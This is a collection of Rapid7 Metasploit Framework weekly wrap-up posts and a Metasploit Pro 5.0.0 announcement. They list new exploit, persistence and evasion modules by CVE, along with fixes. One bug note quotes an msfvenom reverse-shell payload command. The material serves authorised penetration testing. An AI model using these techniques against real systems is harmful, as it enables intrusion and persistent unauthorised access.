Metasploit - Rapid7 Cybersecurity Blog

Metasploit Wrap-Up 04/17/2026

Jack Heysel — Fri, 17 Apr 2026 20:35:42 GMT

Happy Friday - Seven New Metasploit Modules

We’re happy to announce that Metasploit Framework had a big week, landing seven new modules alongside various bug fixes and enhancements. This week’s highlights include RCE modules targeting AVideo, openDCIM, Selenium Grid/Selenoid, and ChurchCRM. On the post-exploitation side, Windows saw three new persistence techniques added as modules, targeting Telemetry scheduled tasks, PowerShell profiles, and Microsoft BITS.

What a time to be alive as a Metasploit user! We wish you all a wonderful weekend and happy hacking.

New module content (7)

AVideo Unauthenticated SQL Injection Credential Dump

Authors: Valentin Lobstein chocapikk@leakix.net and arkmarta

Type: Auxiliary

Pull request: #21075 contributed by Chocapikk

Path: gather/avideo_catname_sqli

AttackerKB reference: CVE-2026-28501

Description: Adds an auxiliary module for CVE-2026-28501, an unauthenticated SQL injection in AVideo <= 22.0, along with a new BenchmarkBasedBlind SQLi mixin class and blind extraction improvements.

openDCIM install.php SQL Injection to RCE

Author: Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #21034 contributed by Chocapikk

Path: linux/http/opendcim_install_sqli_rce

AttackerKB reference: CVE-2026-28517

Description: This PR adds a new exploit module for openDCIM that chains three vulnerabilities (https://github.com/advisories/GHSA-mg2w-x76x-59h8, https://github.com/advisories/GHSA-prmh-rp39-qc4m, https://github.com/advisories/GHSA-428h-8xhf-g3cw) to achieve remote code execution.

Selenium Grid/Selenoid Unauthenticated RCE

Authors: Jon Stratton, Takahiro Yokoyama, Valentin Lobstein chocapikk@leakix.net, and Wiz Research

Type: Exploit

Pull request: #21003 contributed by Chocapikk

Path: linux/http/selenium_greed_rce

Description: This replaces the two separate Selenium Grid RCE modules (Chrome and Firefox) with a single unified module that auto-detects available browsers and selects the best attack vector. The module targets unauthenticated Selenium Grid and Selenoid instances, supporting two techniques: a Firefox profile handler injection that works on all Grid versions including the latest (never patched since 2021), and a Chrome binary override for Grid versions prior to 4.11.0 and all Selenoid versions. No authentication is required.

ChurchCRM Database Restore RCE 6.2.0

Author: LucasCsmt

Type: Exploit

Pull request: #21095 contributed by LucasCsmt

Path: multi/http/churchcrm_db_restore_rce

AttackerKB reference: CVE-2025-68109

Description: Adds a new exploit module for CVE-2025-68109, targeting a file upload vulnerability inside ChurchCRM leading to an RCE. This module will work on version 6.2.0 of ChurchCRM and earlier.

Windows Persistence Bits Job

Author: h00die

Type: Exploit

Pull request: #20839 contributed by h00die

Path: windows/persistence/bits

Description: This adds a new persistence module that uses Microsoft Bits to maintain access to the system.

Powershell Profile Persistence

Author: madefourit

Type: Exploit

Pull request: #20933 contributed by madefourit

Path: windows/persistence/powershell_profile

Description: This adds a new persistence module that uses powershell profiles to maintain access.

Windows Telemetry Persistence

Author: h00die

Type: Exploit

Pull request: #20843 contributed by h00die

Path: windows/persistence/telemetry

Description: Adds a new persistence module, exploit/windows/persistence/telemetry, that abuses the Windows Telemetry scheduled task (Microsoft Compatibility Appraiser / CompatTelRunner) to establish persistence. The module writes a payload to disk and configures the telemetry task to execute it, resulting in a SYSTEM-level Meterpreter session either on the next scheduled run or immediately on demand. Requires an admin-level Meterpreter session on the target.

Enhancements and features (11)

#21078 from Chocapikk - Adds multiple improvements to the multi/http/churchcrm_install_unauth_rce module.
#21085 from dledda-r7 - This refactors the Block API code used by Windows payloads to leverage a new version of the hashing algorithm. This also fixes a bug whereby the MaximumLength field was used when calculating UNICODE_STRING names when it should have been the Length field.
#21236 from bcoles - Add riscv64le and riscv32le architecture support to the fileless fetch payload adapter. This enables in-memory ELF execution via memfd_create on RISC-V Linux targets without writing to disk.
#21252 from zeroSteiner - Adds a new with_adcs_certificate_request method that now used by both the MsIcpr and WebEnrollment mixins that abstracts away the enrollment process and takes a block that performs the actual request. The result is consolidation of messages, post-processing of the successfully issued certificate.
#21255 from mxnvel - This updates two Python payloads (cmd/unix/reverse_python and cmd/unix/reverse_python_ssl) to make the PythonPath option optional. When omitted, it defaults to a shim that will determine the appropriate version of Python at runtime using a small bash expression.
#21275 from adfoster-r7 - Adds multiple improvements to the cve_2025_14847_mongobleed module, such as adding new a dedicated check method, improved compression support detection as only zlib can be exploited, and resolving other false positives.
#21286 from Hemang360 - Adds a cleanup keyword argument to Msf::Post::File#mkdir so callers can skip automatic directory cleanup registration. It is very useful for when we create directories in persistence modules and want the directory to remain.
#21289 from sjanusz-r7 - Updates the db.hosts RPC call to now additionally include the comments associated with the host.
#21291 from sjanusz-r7 - Updates the module.info RPC call to now additionally include the notes associated with the module.
#21304 from adfoster-r7 - Improves multiple auxiliary module check code messages and statuses.

Bugs fixed (4)

#21027 from SilentSobs - Fixes ELF shared object (elf-so) payload generation failing on 32-bit ARM Linux and RISC-V 32-bit LE targets. The _start entry point in the ARM LE template was landing at a non-word-aligned offset, which violates the architecture's 4-byte alignment requirement and caused the shared object to fail to load. The templates now use proper NASM align directives to ensure correct entry point alignment, and a similar fix is applied to the RISC-V 32-bit LE template.
#21268 from adfoster-r7 - Fixes a crash with a small number of auxiliary modules when the check method was run and the vulnerability wasn't present.
#21287 from zeroSteiner - Fixes the EXE templates that were rebuilt in https://github.com/rapid7/metasploit-framework/pull/20502 to work on legacy Windows targets like Server 2000 in case you find yourself in a combination hacking and time-travelling movie.
#21309 from sfewer-r7 - Fixes a false positive in the fortinet_fortiweb_create_admin module when detecting the presence of an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface.

Documentation added (1)

#20843 from h00die - Adds a new persistence module, exploit/windows/persistence/telemetry, that abuses the Windows Telemetry scheduled task (Microsoft Compatibility Appraiser / CompatTelRunner) to establish persistence. The module writes a payload to disk and configures the telemetry task to execute it, resulting in a SYSTEM-level Meterpreter session either on the next scheduled run or immediately on demand. Requires an admin-level Meterpreter session on the target.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Metasploit Wrap-Up 04/10/2026

Simon Janusz — Fri, 10 Apr 2026 19:11:43 GMT

Speedup Improvements of MSFVenom & New Modules

This week, we have added new modules to Metasploit Framework targeting Cisco Catalyst SD-WAN controllers and osTicket as well as updates and improvements to Windows service-for-user persistence, and LDAP/ADCS-related modules to automatically report related services resulting in an improved data stream, which can be queried by using the services command.

We also landed an improvement to msfvenom’s bootup time, thanks to bcoles, resulting in an approximate two-times speedup.

New module content (4)

AD/CS Authenticated Web Enrollment Services Module

Authors: Spencer McIntyre, bwatters-r7, and jhicks-r7

Type: Auxiliary

Pull request: #20752 contributed by bwatters-r7

Path: admin/http/web_enrollment_cert

Description: This adds a new auxiliary/admin/http/web_enrollment_cert modules that allows certificates to be issued from an Active Directory Certificate Services Web Enrollment portal. Its usage is the same as the auxiliary/admin/http/icpr_cert module but enables operators to issue certificates when the web enrollment portal is accessible but the MS-ICPR service is not.

Cisco Catalyst SD-WAN Controller Authentication Bypass

Author: sfewer-r7

Type: Auxiliary

Pull request: #21158 contributed by sfewer-r7

Path: admin/networking/cisco_sdwan_auth_bypass

AttackerKB reference: CVE-2026-20127

Description: This adds an auxiliary module to exploit an authentication bypass vulnerability, CVE-2026-20127, affecting Cisco Catalyst SD-WAN Controller. Recently exploited in the wild as a zero-day.

osTicket Arbitrary File Read via PHP Filter Chains in mPDF

Authors: Arkaprabha Chakraborty <@t1nt1nsn0wy> and HORIZON3.ai Team

Type: Auxiliary

Pull request: #20948 contributed by ArkaprabhaChakraborty

Path: gather/osticket_arbitrary_file_read

AttackerKB reference: CVE-2026-22200

Description: This adds an auxiliary module to exploit, CVE-2026-22200, an authenticated file read vulnerability in osTicket.

Windows Service for User (S4U) Scheduled Task Persistence - Event Trigger

Authors: Brandon McCann "zeknox" bmccann@accuvant.com, Thomas McCarthy "smilingraccoon" smilingraccoon@gmail.com, and h00die

Type: Exploit

Pull request: #20814 contributed by h00die

Path: windows/persistence/service_for_user/event

Description: Updates the Windows service-for-user persistence technique.

Enhancements and features (7)

#20814 from h00die - Updates the Windows service-for-user persistence technique.
#20973 from bitstr3m-48 - This release enables command execution for non-interactive HWBridge sessions via the sessions -c flag. Additionally, the hwbridge/connect module now preserves parsed JSON error bodies from failed HTTP responses, which improves error messaging.
#20977 from g0tmi1k - This updates the exploit/unix/webapp/php_eval module to have a FORMDATA datastore option, which adds HTTP POST-request support and makes the HEADERS datastore option consistent with other modules.
#20979 from g0tmi1k - This updates the exploit/unix/webapp/php_include module with additional datastore options and make its usage more consistent with the similar exploit/unix/webapp/php_eval module.
#21031 from zeroSteiner - Enhances the Metasploit’s LDAP/ADCS-related modules to automatically report related services (LDAP, DCERPC/ICertPassage/ADCS CA) and to improve vulnerability reporting by associating findings with the affected LDAP object’s DN (and, for ADCS template findings, the template name) so results are uniquely keyed and easier to interpret.
#21143 from SaiSakthidar - This bumps the Metasploit payloads to include changes that enable the PHP Meterpreter to open TCP server sockets. This enables operators to listen for inbound connections on compromised hosts and closes a feature gap between PHP and the other Meterpreters.
#21229 from bcoles - This updates the msfvenom utility to use the metadata cache. The result is roughly 2x faster execution times when listing modules

Bugs fixed (1)

#21153 from Nayeraneru - This fixes an issue with some mutable constant datastore options. Using shared options like CHOST or CPORT are not changing visibility across modules anymore.

Documentation added (1)

#21221 from cgranleese-r7 - This PR improves module_doc_template.md with examples to better guide contributors.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 04/03/2026

Simon Janusz — Fri, 03 Apr 2026 19:06:10 GMT

Additional Adapters and More Modules

This week, we added a whole new bunch of HTTP/HTTPS-based CMD payloads for X64 and X86 versions of Windows. The additional breadth of selectable payloads and delivery techniques allows users new options to tailor the attack workflow for their environment. This was contributed by bwatters-r7. Adding new architectures for adapted payloads is surprisingly easy and something a first-time contributor might want to look into!

New modules added to Metasploit Framework also allow for targeting FreeScout and Grav CMS, both of which result in remote code execution. These modules were contributed by Chocapikk and x1o3 respectively. Thanks!

Thanks to g0tmi1k, Metasploit Framework now also includes an exploit module, multi/http/os_cmd_exec, which allows for targeting generic HTTP command execution vulnerabilities where user-supplied input is directly passed to system execution functions via an HTTP request. This can result in a Meterpreter shell on the remote target.

To round this week off, we have a new persistence technique on Windows, thanks to Nayeraneru, which abuses the HKCU\Environment\UserInitMprLogonScript registry value to execute a payload at user logon.

New module content (5)

FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass

Authors: Moses Bhardwaj (MosesOX) , Nir Zadok (nirzadokox) , Valentin Lobstein chocapikk@leakix.net, and offensiveee

Type: Exploit

Pull request: #21069 contributed by Chocapikk

Path: multi/http/freescout_htaccess_rce

AttackerKB reference: CVE-2026-27636

Description: This adds an exploit module for CVE-2026-28289, an unauthenticated remote code execution vulnerability in FreeScout versions prior or equal to 1.8.206.

Grav CMS Admin Direct Install Authenticated Plugin Upload RCE

Authors: binneko and x1o3

Type: Exploit

Pull request: #21029 contributed by x1o3

Path: multi/http/grav_admin_direct_install_rce_cve_2025_50286

AttackerKB reference: CVE-2025-50286

Description: This adds a new exploit module for CVE-2025-50286, an authenticated RCE vulnerability in Grav CMS 1.1.x–1.7.x with Admin Plugin 1.2.x–1.10.x. The module exploits the Direct Install feature to upload a malicious plugin ZIP and execute an arbitrary PHP payload as the web server user.

Generic HTTP Command Execution

Authors: egypt egypt@metasploit.com and g0tmi1k

Type: Exploit

Pull request: #21023 contributed by g0tmi1k

Path: multi/http/os_cmd_exec

Description: Adds a new exploits/multi/http/os_cmd_exec module that targets generic HTTP command execution vulnerabilities where user-supplied input is directly passed to system execution functions via an HTTP request.

Windows Persistence via UserInitMprLogonScript

Author: Nayera

Type: Exploit

Pull request: #21032 contributed by Nayeraneru

Path: windows/persistence/userinit_mpr_logon_script

Description: This adds a new Windows persistence module that abuses the HKCU\Environment\UserInitMprLogonScript registry value to execute a payload at user logon.

HTTP and HTTPS Fetch

Authors: Brendan Watters, Chris John Riley, hdm x@hdm.io, sf stephen_fewer@harmonysecurity.com, and vlad902 vlad902@gmail.com

Type: Payload (Adapter)

Pull request: #21172 contributed by bwatters-r7

Description: This adds HTTP and HTTPS fetch payloads for 32-bit Windows targets.

Enhancements and features (8)

#20999 from Aaditya1273 - Removes the legacy windows/local/persistence module, which has been superseded by the modernized windows/persistence/registry module. A moved_from alias ensures that existing scripts and workflows referencing the old module path are automatically redirected to the new one with a deprecation warning.
#21090 from g0tmi1k - Updates multiple modules to make use of report_service().
#21097 from g0tmi1k - Updates auxiliary/scanner/ftp/anonymous.rb to report the FTP service regardless of anonymous being enabled.
#21144 from Nayeraneru - Improves YARD documentation for lib/msf/core/auxiliary/web/http.rb by documenting the Request and Response helpers, the public HTTP request APIs, and the internal custom-404/request-handling flow.
#21145 from Nayeraneru - Adds YARD docs to lib/msf/core/auxiliary/auth_brute.rb, focusing on the AuthBrute mixin’s credential-building, brute-force state, logging, and cleanup helpers.
#21150 from Nayeraneru - Adds YARD documentation to lib/msf/core/payload/adapter/fetch.rb to improve consistency and clarify how the fetch adapter generates URIs, builds fetch commands, and resolves platform-specific execution behavior.
#21194 from bcoles - This updates the post/linux/gather/enum_protections module by adding documentation and additional checks for modern protections and applications.
#21214 from adfoster-r7 - Adds additional validation to db_import before attempting to import values.
#21048 from zeroSteiner - Not written - add release notes directly to the pull request, then regenerate. Do not edit manually without ensuring the pull request has the release note present.

Bugs fixed (6)

#21004 from EclipseAditya - This fixes a bug in the #normalize_key method provided by the Windows Registry mixin. The result is correct behavior when using shell sessions to check for keys with trailing \ characters.
#21138 from g0tmi1k - Fixes a bug that stopped the auxiliary/server/dhcp module from running as a background job when RHOSTS had been set.
#21188 from adfoster-r7 - Fixes a crash on older Ruby versions when scanning binary files.
#21199 from Hemang360 - Fixes crash in auxiliary/scanner/http/wp_perfect_survey_sqli when run against invalid or unreachable targets.
#21207 from zeroSteiner - Fixes warning when running the linux/gather/enum_protections module.
#21208 from adfoster-r7 - Fixes multiple warnings in modules that reported notes incorrectly.
#21073 from Hemang360 - Fixes a bug where running exploit/multi/handler with a reverse HTTP/HTTPS payload multiple times on the same port caused cleanup issues.

Documentation added (6)

#21149 from Adithyadspawar - Adds documentation to the following login scanners: ftp/bison_ftp_traversal, http/apache_activemq_traversal, http/coldfusion_version, http/drupal_views_user_enum and http/elasticsearch_traversal.
#21186 from Devansh7006 - Adds documentation for the wordpress_pingback_access module.
#21187 from Devansh7006 - Updates documentation for auxiliary/scanner/http/http_put.
#21200 from dineshg0pal - Updates the example code snippet for writing Metasploit Go modules.
#21201 from aryan9190 - Adds YARD documentation for Rex::Post::IO class.
#21217 from dineshg0pal - Fixes minor errors in documentation files.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 03/27/2026

Spencer McIntyre — Fri, 27 Mar 2026 20:48:03 GMT

Better NTLM Relaying Functionality

This week’s release brings an improvement to the SMB NTLM relay server. In the past, it’s support has been expanded with modules for relaying to HTTP (ESC8), MSSQL and LDAP while still receiving connections over the humble SMB service. Prior to this release, clients required a key behavior in how they handled SMB’s STATUS_NETWORK_SESSION_EXPIRED error code, in order to relay a single authentication attempt to multiple targets. Most clients other than Window’s “net use” do not handle these errors and were thus incompatible with Metasploit SMB NTLM relaying capabilities. Now, when a single target is specified, Metasploit alters its relaying strategy to forward the Net-NTLM messages immediately, making it compatible with a broader range of clients including Linux’s smbclient. In addition, the client in RubySMB was updated to mimic the behaviour of “net use” allowing authentication attempts from RubySMB to be relayed to multiple targets successfully.

New module content (3)

ESC/POS Printer Command Injector

Author: FutileSkills

Type: Auxiliary

Pull request: #20478 contributed by futileskills

Path: admin/printer/escpos_tcp_command_injector

Description: Adds a new auxiliary module that exploits CVE-2026-23767, an unauthenticated ESC/POS command vulnerability in networked Epson-compatible printers. The vulnerability allows an attacker to send crafted commands over the network to inject custom ESC/POS print commands, which are used in various receipt printers.

Eclipse Che machine-exec Unauthenticated RCE

Authors: Greg Durys gregdurys.security@proton.me and Richard Leach

Type: Exploit

Pull request: #20835 contributed by GregDurys

Path: linux/http/eclipse_che_machine_exec_rce

AttackerKB reference: CVE-2025-12548

Description: This adds a module for CVE-2025-12548, an unauthenticated RCE in the Eclipse Che machine-exec service. The vulnerability allows attackers to connect over WebSocket on port 3333 and execute commands via JSON-RPC without authentication. This affects Red Hat OpenShift DevSpaces environments.

Barracuda ESG TAR Filename Command Injection

Authors: Curt Hyvarinen, Mandiant, and cfielding-r7

Type: Exploit

Pull request: #21033 contributed by Alpenlol

Path: linux/smtp/barracuda_esg_tarfile_rce AttackerKB reference: CVE-2023-2868

Description: Adds exploit module for CVE-2023-2868, a command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances. Filenames in TAR attachments are passed to shell commands without sanitization, allowing RCE via backtick injection.

Enhancements and features (1)

#21049 from h00die - This updates post modules to use an API that will expand multiple environment variables when set within the WritableDir option.

Bugs fixed (5)

#20967 from jheysel-r7 - This fix an issue that prevents successful authentication relay from Ruby SMB Client and smbclient. These clients are now compatible with Msf::Exploit::Remote::SMB::RelayServer.
#21148 from adfoster-r7 - Fixes a bug where setting VERBOSE logging as false globally would still cause verbose logging to occur.
#21169 from SaiSakthidar - This fixes a bug that was preventing Mach-O binaries from being identified due to a Ruby string encoding compatibility problem.
#21173 from msutovsky-r7 - Fixes a crash when attempting to generate a vbs payload with msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=44 -f vbs.
#21174 from adfoster-r7 - Fixes a bug when parsing msfconsole's -x flag when additional semicolons are present that are not meant to separate commands. i.e. msfconsole -x 'set option_name "a;b"'.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 03/20/2026

Brendan Watters — Fri, 20 Mar 2026 20:03:54 GMT

♫ I Just Called ♫ To Say ♫ 7f45 4c46 0201 0100 0000 0000 0000 0000 0300 3e00 0100♫

This release contains 2 new exploit modules, 2 enhancements, and 7 bug fixes. Community contributor Chocapikk submitted both exploit modules this release: one targeting AVideo-Encoder’s getImage.php file and another targeting FreePBX. Leading the enhancements is a granularization for LDAP queries allowing the omission of SACL data on security descriptors, as without the proper permissions the entire query of the security descriptor will fail if the SACL data is even just a part of the query.

New module content (2)

AVideo Encoder getImage.php Unauthenticated Command Injection

Authors: Valentin Lobstein chocapikk@leakix.net and arkmarta

Type: Exploit

Pull request: #21076 contributed by Chocapikk

Path: linux/http/avideo_encoder_getimage_cmd_injection

AttackerKB reference: CVE-2026-29058

Description: Adds an exploit module for CVE-2026-29058, an unauthenticated OS command injection in AVideo Encoder's getImage.php endpoint.

FreePBX filestore authenticated command injection

Authors: Cory Billington and Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #20719 contributed by Chocapikk

Path: unix/http/freepbx_filestore_cmd_injection

AttackerKB reference: CVE-2025-64328

Description: Adds a new Metasploit exploit module for FreePBX filestore authenticated command injection (CVE-2025-64328) with automatic vulnerable-version detection and full documentation, and renames the XorcomCompletePbx HTTP mixin to CompletePBX updating affected modules accordingly.

Enhancements and features (2)

#20730 from zeroSteiner - This update modifies the ldap_query module to skip querying the SACL (System Access Control List) on security descriptors by default. This behavior is now controlled by a new option, LDAP::QuerySacl. This change is necessary when using a non-privileged user to query security descriptors via LDAP; otherwise, querying the SACL will cause the entire query to be blocked, resulting in no security descriptors being returned.
#20997 from Nayeraneru - This adds a new OptTimedelta datastore option type. It enables module authors to specify a time duration and users to set it with a human-friendly syntax.

Bugs fixed (7)

#20960 from g0tmi1k - This adds a DHCPINTERFACE option to the DHCP server mixin, allowing modules that start that server to specify a particular interface to bind to.
#21020 from g0tmi1k - This makes a small change to the docs by removing two lines that were previously duplicated.
#21024 from Aaditya1273 - Fixes a bug in the JSON-RPC msfrpcd functionality that incorrectly required SSL certificates to be present even when disabled with msfrpcd -S.
#21025 from Hemang360 - Fixes a crash when calling the HTTP cookie jar with non-string values.
#21028 from SilentSobs - Fixes a crash when using the reload_all command no module is present.
#21081 from Hemang360 - Fixes a crash when using the windows/exec with non-ascii characters.
#21139 from jheysel-r7 - This fixes a bug in the ldap_esc_vulnerable_cert_finder module that was preventing authentication from working when making a WinRM connection.

Documentation added (1)

#21074 from jeanmtr - Adds documentation for the pop3_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 03/13/2026

Dean Welch — Fri, 13 Mar 2026 19:06:41 GMT

No bad luck here: Friday the 13th brings new modules and a Metasploit Pro milestone

This week’s Metasploit Framework release delivers three new modules across reconnaissance, evasion, and exploitation: LeakIX-powered discovery for exposed services and leaked data, a Linux x64 RC4 payload packer for more flexible evasive delivery, and an unauthenticated RCE module for SPIP Saisies (CVE-2025-71243). Alongside those additions, we shipped practical quality-of-life improvements including a smaller configurable bind_netcat payload path, and automatic WordPress service reporting in the WordPress mixin.

Finally, we’re also excited to share the new Metasploit Pro 5.0.0 release with an updated UI and SSO support amongst other changes, check out the announcement here: Announcing Metasploit Pro 5: Penetration Testing, Evolving.

New module content (3)

LeakIX Search

Authors: LeakIX support@leakix.net and Valentin Lobstein chocapikk@leakix.net

Type: Auxiliary

Pull request: #21002 contributed by Chocapikk

Path: gather/leakix_search

Description: Adds a new module auxiliary/gather/leakix_search, a new module for LeakIX API - a search engine focused on indexing internet-exposed services and leaked credentials/databases.

Linux RC4 Encrypted Payload Generator

Author: Massimo Bertocchi

Type: Evasion

Pull request: #20966 contributed by litemars

Path: linux/x64/rc4_packer

Description: Adds a new module evasion/linux/x64/rc4_packer packer that encrypts the generated payload with RC4, prepends an optional sleep-based delay (nanosleep), and decrypts/executes the payload at runtime via a compact precompiled stub.

SPIP Saisies Plugin Unauthenticated RCE

Authors: OpenStudio and Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #21001 contributed by Chocapikk

Path: multi/http/spip_saisies_rce

AttackerKB reference: CVE-2025-71243

Description: This adds a new module for CVE-2025-71243, an unauthenticated PHP code-injection vulnerability in the SPIP Saisies plugin. The injection takes place through _anciennes_valeurs, which allows an attacker to inject a PHP payload.

Enhancements and features (2)

#20885 from dledda-r7 - Updates the bind_netcat payload to allow it to be smaller by selecting either default or BSD-style netcat command syntax. Previously, the payload ran both command syntaxes combined by an OR operator so wherever it was executed, the payload worked. The default behavior remains to run both, but in the event a user needs a significantly shorter payload, they can select a single netcat syntax and adjust the filenames.
#20961 from Nayeraneru - This adds service reporting to Wordpress mixin. Now, when you use a Wordpress module, it will automatically report the target as Wordpress if detected.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

The Face of Penetration Testing is Changing: Announcing Metasploit Pro 5.0.0

The Metasploit Team — Thu, 12 Mar 2026 13:00:00 GMT

The role and demand for red-teaming capabilities are growing, as more exploitable CVEs make their way into criminal hands. Being proactive is no longer a capability that can be reserved for annual tests, but a continuous assessment to determine exposure and even through the validation of an organization's security posture. With this in mind, we are delighted to announce the long awaited availability of Metasploit Pro 5.0.0 – which is not just an update, but a fundamentally new approach to red-teaming, designed with the sole intention of staying ahead of ever-increasingly capable threat actors.

Amongst the multitude of changes, Metasploit 5.0.0 offers an intuitive testing workflow that removes the ever evolving complexity of testing, as well as a suite of powerful new modules and critical enhancements. This is the version you can't afford to miss. For all the technical details, the granular release notes can be viewed here.

So what’s new?

Intuitive testing workflow

Say goodbye to complexity, as Metasploit Pro has completely overhauled the testing workflow. Updates are highlighted by an intuitive user interface, ensuring that your focus remains on high-value penetration testing and vulnerability validation, not fighting the interface. These changes are the foundation for the future, preserving the core functionality you rely on while enabling even more powerful features down the road.

⠀

Stop guessing and start seeing. The new implementation of Network Topology support provides instant, crystal-clear clarity on hosts that have been compromised, have associated cracked credentials, or captured data. For enterprise environments with vast, complex surfaces, we’ve invested in performance improvements, giving you the power to zoom and pan through hundreds of available hosts with zero lag. This is actionable visualization that transforms data into defense.

⠀

Vulnerability detection improvements

Get the necessary assurance before you click 'run.' Metasploit modules can now register crucial vulnerability detection details as part of running. This means that modules capable of running pre-check detection logic give you the full intelligence picture before you attempt exploitation. This new level of transparency and detail empowers you to make smarter, faster decisions, saving you precious time and minimizing the chance of failed module runs and adverse side effects.

⠀

Advanced workflow improvements

Unleash your inner expert with unprecedented control and efficiency. Advanced users of Metasploit Pro will immediately benefit from multiple UX improvements to the single module run page. Tired of manually configuring options? Users now receive intelligent suggestions for applicable values, including network targets, Kerberos credential cache files, and more – streamlining ADCS workflows.

⠀

Furthermore, you now have the ability to manually choose and configure individual payloads, giving you the final word on how you exploit targets. Metasploit Pro will continue to default to the most common payload for each exploit.

Plus, new quality-of-life improvements for replaying module runs ensure that verifying remediation and re-exploiting targets is a seamless, one-click process. Gone are the days of reconfiguring an entire module run to change a single option. The old list view has also been updated to include the ability to view the module option details that a module was run with. These capabilities can additionally be leveraged by advanced users who are interacting with Metasploit Pro in a programmatic fashion or through the command line interface to see exactly how Metasploit Pro is running modules.

⠀

Finally, boost your team's collaboration with the new session tagging feature. Sessions can now be tagged to facilitate advanced and coordinated post-exploitation workflows. Team members can apply instant, custom tags to track status and flag arbitrary qualities, which significantly improves coordination and organization across multi-person engagements.

AD CS exploitation

Tackle one of the most critical attack vectors in modern networks: Metasploit continues its relentless investment in modern exploitation techniques with the groundbreaking updates to the AD CS Workflows Metamodule. This powerful new feature is a significant advancement, providing security professionals with an automated, comprehensive approach to identifying and leveraging nine common AD CS vulnerabilities.

Now we’ve taken it even further, with new support for the latest and most dangerous ESC flaws: ESC9, ESC10, and ESC16. Take back control of your Active Directory environment and neutralize these threats with surgical precision. For detailed configuration instructions and comprehensive feature documentation, visit our AD CS Workflows MetaModule documentation.

⠀

Session tags

In fast-moving operations, context can disappear quickly as new sessions come online and analysts shift between tasks. Session tagging brings clarity back to your workflow by letting you attach meaningful labels to every open session. Instead of relying on IPs or hostnames alone, you can tag sessions with identifiers that matter to your team - such as priority, environment, or role - making it easy to group related systems and instantly recognize high-value targets.

⠀

SAML Single Sign On

Metasploit Pro now incorporates SAML Single Sign-On (SSO) authentication, providing your team with a simple, unified login experience. By connecting to your centralized directory, users can access Metasploit Pro with the same credentials they use for all other major applications. Administrators can easily configure their identity provider (IDP) to enable a passwordless workflow and utilize existing Multi-Factor Authentication (MFA) services, making access quick, consistent, and part of your standard corporate flow.

These features are available in Metasploit Pro 5.0.0 onwards. We’re also proud to collaborate with our customers, who are often the source of inspiration for product evolution. Ideas for improvements or enhancements can be shared with our Support team to help you refine the idea, then submit it to our Product team on your behalf.

Related viewing

Rapid7 Labs launched a podcast today! Episode 1 of 'Hacktics & Telemetry' is now live on Rapid7's YouTube page. Alongside some expert commentary on emergent threats and an exciting guest spot, the final segment is all about Metasploit Pro 5.0.0. Dive into our official companion blog here, and find the full episode embedded below.

⠀

Metasploit Wrap-Up 03/06/2026

Martin Sutovsky — Fri, 06 Mar 2026 18:28:41 GMT

Encoder exposed!

Some of our releases add new ways in; this one adds new ways to stay in. There are, of course, still new RCE toys in the box (Tactical RMM via Jinja2 SSTI and an unauthenticated MajorDoMo exploit). Still, the underlying theme is payloads: more control over how they are packaged and delivered, and fewer "why did it die instantly?" moments. We, like our community of module authors, grew tired of having to do everything by hand. You can now pick encoders (and tweak their options) directly for exploit and payload modules without extra glue code. Less plumbing, more choosing-the-right-badchar-killer-at-runtime.

New module content (3)

Linux RC4 Packer with In-Memory Execution (x86)

Author: Massimo Bertocchi

Type: Evasion

Pull request: #20965 contributed by litemars

Path: linux/x86/rc4_packer

Description: Adds a new module evasion/linux/x86/rc4_packer that encrypts the generated payload with RC4, prepends an optional sleep-based delay (nanosleep), and decrypts/executes the payload at runtime via a compact precompiled stub.

Tactical RMM Jinja2 SSTI Remote Code Execution

Authors: Gabriel Gomes and Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #21017 contributed by Chocapikk

Path: linux/http/tacticalrmm_ssti_rce_cve_2025_69516

AttackerKB reference: CVE-2025-69516

Description: This adds an exploit module for CVE-2025-69516, a Jinja2 SSTI in Tactical RMM < 1.4.0 where the reporting template preview endpoint evaluates user-controlled templates without sandboxing, enabling authenticated RCE. The module logs in via the Knox API, auto-detects the API host from /env-config.js, and exploits the template preview feature.

MajorDoMo Remote Command Injection via cycle_execs Race Condition

Author: Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #21000 contributed by Chocapikk

Path: multi/http/majordomo_cmd_injection_rce

AttackerKB reference: CVE-2026-27175

Description: Adds three exploit modules for MajorDoMo, an open-source home automation platform. All three vulnerabilities are unauthenticated.

Enhancements and features (2)

#20852 from dledda-r7 - This adds encoder options for exploit and payload modules. It allows the user to select the encoder and modify its options when using exploit or payload without the need of adding additional code into the module.
#20987 from sjanusz-r7 - Allows AS-REP and Kerberoast modules to be ran against a pre-existing LDAP session as well as RHOST values.

Bugs fixed (5)

#20740 from Chocapikk - This adds a new SRVSSL option to the HttpServer library, allowing SSL to be enabled for the HTTP server independently from the HTTP client.
#20830 from SilentSobs - This fixes a portability issue in Msf::Post::File.stat where the code incorrectly assumed a GNU stat output format.
